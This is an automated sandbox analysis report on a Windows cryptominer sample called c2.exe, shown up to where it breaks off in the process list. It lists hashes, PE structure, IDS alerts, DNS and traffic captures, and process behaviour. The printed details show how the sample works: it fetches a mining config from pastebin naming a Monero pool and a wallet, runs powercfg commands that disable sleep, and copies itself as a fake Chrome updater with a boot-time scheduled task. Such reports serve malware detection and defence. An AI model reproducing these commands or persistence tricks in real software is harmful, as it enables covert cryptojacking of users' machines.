                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                    Entropy (8bit):7.67011402410826
                                                                    TrID:
                                                                    • Win64 Executable (generic) (12005/4) 74.95%
                                                                    • Generic Win/DOS Executable (2004/3) 12.51%
                                                                    • DOS Executable Generic (2002/1) 12.50%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                    File name:c2.exe
                                                                    File size:5'737'472 bytes
                                                                    MD5:eb0588e6420a0a2fb8b262554091add3
                                                                    SHA1:5c2bdd9050a44b7afd028e9be44142da93232a37
                                                                    SHA256:6cb04057a0313bc34459aba72170f4039148aaace0b396b6c881b92769199853
                                                                    SHA512:8278fa6a29258f4095200540d003f33ede8ac7d8267fcaa14872fdad674205057fe728754f53ac43fe2f4dcd36fbe223f6d52c9d71ae4f7ca98c2921aec710af
                                                                    SSDEEP:98304:Tr+uGthg9APk/gpZ49dTpFj8MxJckGsab4PkNU/ZsGpSGvJXkt:TihtO9A8sybTFjGGPjsMSGvJUt
                                                                    TLSH:1946C0D4BFDEFB45CE708630CD0BAC06B7DA64259E8D436632A5D60D42376B3D92A8C1
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.F....W................@............................. X.......X...`... ............................

                                                                    File Icon

                                                                    Icon Hash:90cececece8e8eb0

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x1400012fd
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x140000000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                    TLS Callbacks:0x4000329c, 0x1, 0x40003280, 0x1
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:84364258335aa120aa66630a9ee645bf

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    dec eax
                                                                    sub esp, 28h
                                                                    dec eax
                                                                    mov eax, dword ptr [00576E68h]
                                                                    mov dword ptr [eax], 00000001h
                                                                    call 00007F41392A5D73h
                                                                    nop
                                                                    nop
                                                                    dec eax
                                                                    add esp, 28h
                                                                    ret
                                                                    dec eax
                                                                    sub esp, 28h
                                                                    dec eax
                                                                    mov eax, dword ptr [00576E4Bh]
                                                                    xor edx, edx
                                                                    mov dword ptr [eax], edx
                                                                    call 00007F41392A5D58h
                                                                    nop
                                                                    nop
                                                                    dec eax
                                                                    add esp, 28h
                                                                    ret
                                                                    dec eax
                                                                    sub esp, 28h
                                                                    call 00007F41392A8AF7h
                                                                    dec eax
                                                                    cmp eax, 01h
                                                                    sbb eax, eax
                                                                    dec eax
                                                                    add esp, 28h
                                                                    ret
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    dec eax
                                                                    lea ecx, dword ptr [00000005h]
                                                                    jmp 00007F41392A5F2Eh
                                                                    ret
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    ret
                                                                    inc ecx
                                                                    push edi
                                                                    inc ecx
                                                                    push esi
                                                                    inc ecx
                                                                    push ebp
                                                                    inc ecx
                                                                    push esp
                                                                    push ebp
                                                                    push edi
                                                                    push esi
                                                                    push ebx
                                                                    dec eax
                                                                    sub esp, 48h
                                                                    dec esp
                                                                    mov esp, dword ptr [esp+000000B0h]
                                                                    dec esp
                                                                    mov ebp, dword ptr [esp+000000B8h]
                                                                    dec esp
                                                                    mov edi, dword ptr [esp+000000C0h]
                                                                    dec esp
                                                                    mov esi, dword ptr [esp+000000C8h]
                                                                    dec eax
                                                                    mov edi, ecx
                                                                    dec eax
                                                                    mov ecx, edx
                                                                    dec esp
                                                                    mov ebx, eax
                                                                    dec esp
                                                                    mov esi, ecx
                                                                    call 00007F41392A66E3h
                                                                    test al, al
                                                                    jne 00007F41392A5FA2h
                                                                    mov edx, esi
                                                                    dec eax

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x57d0000x5c4.idata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5800000x388.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5790000x570.pdata
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5810000x84.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x577de00x28.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x57d1900x150.idata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x45780x4600086ffce09aff7cb44263d553168e79b3False0.5748883928571429data6.2554154553510095IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .data0x60000x570d400x570e008a244fbb8bb1fbd62a7de109eec86f2cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rdata0x5770000x16800x18009fd4b1493639d12320f01a4d0ceae058False0.4041341145833333data4.3282044619111035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .pdata0x5790000x5700x6000bd7b3130bda8394c01cd314503e9808False0.4134114583333333data4.180517159286159IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .xdata0x57a0000x40c0x6006e2711e41b7236fa17485c99552f04a1False0.251953125data3.0246054589923945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .bss0x57b0000x12a00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .idata0x57d0000x5c40x600e64225ab0f6687883e87af34cba5ade2False0.361328125data4.041229808304254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .CRT0x57e0000x600x200e945d9040c7a97702c9db9ea618741bbFalse0.06640625data0.27950974526108024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .tls0x57f0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x5800000x3880x400e5e982a2259c1b0a2a215d8781c7f919False0.4482421875data5.013099963507475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .reloc0x5810000x840x20058d17e13e89481fbae05163e12d57bcdFalse0.25390625data1.5215036536150712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_MANIFEST0x5800580x330XML 1.0 document, ASCII textEnglishUnited States0.508578431372549

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                                                    msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, fputs, free, malloc, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr, _wcsnicmp, _wcsicmp

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-12-17T12:46:06.900142+01002054247ET MALWARE SilentCryptoMiner Agent Config Inbound1104.20.4.235443192.168.2.449731TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 17, 2024 12:46:03.995979071 CET4973010343192.168.2.4103.3.62.64
                                                                    Dec 17, 2024 12:46:04.116028070 CET1034349730103.3.62.64192.168.2.4
                                                                    Dec 17, 2024 12:46:04.116118908 CET4973010343192.168.2.4103.3.62.64
                                                                    Dec 17, 2024 12:46:04.116940022 CET4973010343192.168.2.4103.3.62.64
                                                                    Dec 17, 2024 12:46:04.236757040 CET1034349730103.3.62.64192.168.2.4
                                                                    Dec 17, 2024 12:46:05.086333990 CET49731443192.168.2.4104.20.4.235
                                                                    Dec 17, 2024 12:46:05.086390972 CET44349731104.20.4.235192.168.2.4
                                                                    Dec 17, 2024 12:46:05.086833000 CET49731443192.168.2.4104.20.4.235
                                                                    Dec 17, 2024 12:46:05.103291035 CET49731443192.168.2.4104.20.4.235
                                                                    Dec 17, 2024 12:46:05.103329897 CET44349731104.20.4.235192.168.2.4
                                                                    Dec 17, 2024 12:46:05.745414019 CET1034349730103.3.62.64192.168.2.4
                                                                    Dec 17, 2024 12:46:05.745536089 CET1034349730103.3.62.64192.168.2.4
                                                                    Dec 17, 2024 12:46:05.745587111 CET4973010343192.168.2.4103.3.62.64
                                                                    Dec 17, 2024 12:46:06.326366901 CET44349731104.20.4.235192.168.2.4
                                                                    Dec 17, 2024 12:46:06.328221083 CET49731443192.168.2.4104.20.4.235
                                                                    Dec 17, 2024 12:46:06.328238010 CET44349731104.20.4.235192.168.2.4
                                                                    Dec 17, 2024 12:46:06.329690933 CET44349731104.20.4.235192.168.2.4
                                                                    Dec 17, 2024 12:46:06.329766035 CET49731443192.168.2.4104.20.4.235
                                                                    Dec 17, 2024 12:46:06.331717968 CET49731443192.168.2.4104.20.4.235
                                                                    Dec 17, 2024 12:46:06.331798077 CET44349731104.20.4.235192.168.2.4
                                                                    Dec 17, 2024 12:46:06.331885099 CET49731443192.168.2.4104.20.4.235
                                                                    Dec 17, 2024 12:46:06.331890106 CET44349731104.20.4.235192.168.2.4
                                                                    Dec 17, 2024 12:46:06.375968933 CET49731443192.168.2.4104.20.4.235
                                                                    Dec 17, 2024 12:46:06.899947882 CET44349731104.20.4.235192.168.2.4
                                                                    Dec 17, 2024 12:46:06.900038958 CET44349731104.20.4.235192.168.2.4
                                                                    Dec 17, 2024 12:46:06.900207043 CET49731443192.168.2.4104.20.4.235
                                                                    Dec 17, 2024 12:46:06.907540083 CET49731443192.168.2.4104.20.4.235
                                                                    Dec 17, 2024 12:46:06.907560110 CET44349731104.20.4.235192.168.2.4
                                                                    Dec 17, 2024 12:46:06.913398027 CET4973010343192.168.2.4103.3.62.64
                                                                    Dec 17, 2024 12:46:06.913398981 CET4973010343192.168.2.4103.3.62.64
                                                                    Dec 17, 2024 12:46:06.913832903 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:07.034197092 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:07.034401894 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:07.035027027 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:07.154788017 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:08.607425928 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:08.607520103 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:08.607614040 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:08.608488083 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:08.728266954 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:09.169125080 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:09.219769001 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:09.404848099 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:09.454164028 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:09.596832991 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:09.641577005 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:15.963438034 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:16.016617060 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:26.055392981 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:26.204174042 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:35.062146902 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:35.110522032 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:45.029025078 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:45.110986948 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:55.030191898 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:55.219835997 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:47:00.019067049 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:47:00.065308094 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:47:10.022248030 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:47:10.126123905 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:47:20.037029028 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:47:20.126162052 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:47:30.093190908 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:47:30.219966888 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:47:40.047580957 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:47:40.126192093 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:47:50.059048891 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:47:50.220005989 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:48:00.067523003 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:48:00.219976902 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:48:10.059845924 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:48:10.110650063 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:48:20.070759058 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:48:20.126296997 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:48:30.077368021 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:48:30.126296997 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:48:42.082745075 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:48:42.126318932 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:48:52.074160099 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:48:52.126363993 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:49:02.104476929 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:49:02.262633085 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:49:12.072252035 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:49:12.126388073 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:49:22.051728010 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:49:22.180736065 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:49:29.001411915 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:49:29.126434088 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:49:39.026396036 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:49:39.126473904 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:49:48.999936104 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:49:49.126492977 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:49:59.033806086 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:49:59.126604080 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:50:09.037151098 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:50:09.083920002 CET4973210343192.168.2.451.79.145.144

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 17, 2024 12:46:03.845988989 CET6416153192.168.2.41.1.1.1
                                                                    Dec 17, 2024 12:46:03.991067886 CET53641611.1.1.1192.168.2.4
                                                                    Dec 17, 2024 12:46:04.946609974 CET6021453192.168.2.41.1.1.1
                                                                    Dec 17, 2024 12:46:05.084379911 CET53602141.1.1.1192.168.2.4

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 17, 2024 12:46:03.845988989 CET192.168.2.41.1.1.10xacfeStandard query (0)xmr-asia1.nanopool.orgA (IP address)IN (0x0001)false
                                                                    Dec 17, 2024 12:46:04.946609974 CET192.168.2.41.1.1.10xf0a0Standard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 17, 2024 12:46:03.991067886 CET1.1.1.1192.168.2.40xacfeNo error (0)xmr-asia1.nanopool.org51.79.145.144A (IP address)IN (0x0001)false
                                                                    Dec 17, 2024 12:46:03.991067886 CET1.1.1.1192.168.2.40xacfeNo error (0)xmr-asia1.nanopool.org103.3.62.64A (IP address)IN (0x0001)false
                                                                    Dec 17, 2024 12:46:03.991067886 CET1.1.1.1192.168.2.40xacfeNo error (0)xmr-asia1.nanopool.org172.104.165.191A (IP address)IN (0x0001)false
                                                                    Dec 17, 2024 12:46:03.991067886 CET1.1.1.1192.168.2.40xacfeNo error (0)xmr-asia1.nanopool.org51.79.145.202A (IP address)IN (0x0001)false
                                                                    Dec 17, 2024 12:46:05.084379911 CET1.1.1.1192.168.2.40xf0a0No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                    Dec 17, 2024 12:46:05.084379911 CET1.1.1.1192.168.2.40xf0a0No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                    Dec 17, 2024 12:46:05.084379911 CET1.1.1.1192.168.2.40xf0a0No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • pastebin.com

                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.449731104.20.4.2354437868C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-17 11:46:06 UTC114OUTGET /raw/YLG9StR0 HTTP/1.1
                                                                    Accept: */*
                                                                    Connection: close
                                                                    Host: pastebin.com
                                                                    User-Agent: cpp-httplib/0.12.6
                                                                    2024-12-17 11:46:06 UTC388INHTTP/1.1 200 OK
                                                                    Date: Tue, 17 Dec 2024 11:46:06 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: MISS
                                                                    Last-Modified: Tue, 17 Dec 2024 11:46:06 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 8f36abb73fef4265-EWR
                                                                    2024-12-17 11:46:06 UTC486INData Raw: 31 64 66 0d 0a 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 78 6d 72 2d 61 73 69 61 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 31 30 33 34 33 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 34 38 4c 58 52 46 70 47 36 61 53 56 39 31 6d 71 77 4b 44 38 6d 66 67 37 73 4e 59 47 71 36 52 4b 44 48 71 4d 6f 31 72 79 61 4d 6a 43 68 70 4b 41 69 7a 57 46 73 46 61 59 67 51 58 5a 45 46 4d 36 74 61 34 6f 4d 54 4a 61 62 35 62 41 77 35 47 66 6b 38 34 41 72 6f 4a 36 46 4e 44 33 58 44 52 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 66 61 6c 73 65 2c 0d 0a 20 20 20 20 22 73 73 6c
                                                                    Data Ascii: 1df{ "algo": "rx/0", "pool": "xmr-asia1.nanopool.org", "port": 10343, "wallet": "48LXRFpG6aSV91mqwKD8mfg7sNYGq6RKDHqMo1ryaMjChpKAizWFsFaYgQXZEFM6ta4oMTJab5bAw5Gfk84AroJ6FND3XDR", "password": "", "nicehash": false, "ssl
                                                                    2024-12-17 11:46:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:06:46:01
                                                                    Start date:17/12/2024
                                                                    Path:C:\Users\user\Desktop\c2.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\c2.exe"
                                                                    Imagebase:0x7ff632ae0000
                                                                    File size:5'737'472 bytes
                                                                    MD5 hash:EB0588E6420A0A2FB8B262554091ADD3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:1
                                                                    Start time:06:46:01
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff653450000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:2
                                                                    Start time:06:46:01
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:06:46:01
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:8
                                                                    Start time:06:46:01
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:9
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -standby-timeout-ac 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:10
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powercfg /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff77c010000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:13
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Program Files\Google\Chrome\updater.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\updater.exe"
                                                                    Imagebase:0x7ff602810000
                                                                    File size:5'737'472 bytes
                                                                    MD5 hash:EB0588E6420A0A2FB8B262554091ADD3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 42%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:14
                                                                    Start time:06:46:02
                                                                    Start date:17/12/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
